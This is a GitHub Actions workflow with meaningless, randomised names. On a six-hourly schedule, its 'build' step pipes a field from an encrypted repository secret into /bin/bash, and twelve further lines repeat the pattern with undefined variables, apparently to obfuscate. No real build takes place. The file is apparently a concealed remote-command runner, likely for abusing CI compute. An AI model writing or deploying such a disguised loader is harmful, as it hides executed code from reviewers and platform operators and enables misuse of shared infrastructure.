name: liulinglong6510
on:
  workflow_dispatch:
  schedule:
    - cron: '5 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: liulinglong6510
        env:
          xwz10: ${{ secrets.xwz10 }}
        run: |
          echo $xwz10 | jq -r .z816 | /bin/bash
          echo $bih1530 | jq -r .ngud571 | /bin/bash
          echo $vm6749 | jq -r .z92858 | /bin/bash
          echo $cxdzo44 | jq -r .v3 | /bin/bash
          echo $jvlw138 | jq -r .fzh83681 | /bin/bash
          echo $wan7 | jq -r .dbzxw4707 | /bin/bash
          echo $xw9507 | jq -r .pvwtd69 | /bin/bash
          echo $j42 | jq -r .jhehn15385 | /bin/bash
          echo $bur69018 | jq -r .er6502 | /bin/bash
          echo $gkt5 | jq -r .g13989 | /bin/bash
          echo $e17 | jq -r .sbu15 | /bin/bash
          echo $vlzxc2 | jq -r .rmjq9443 | /bin/bash
          echo $pbk39 | jq -r .bm1 | /bin/bash

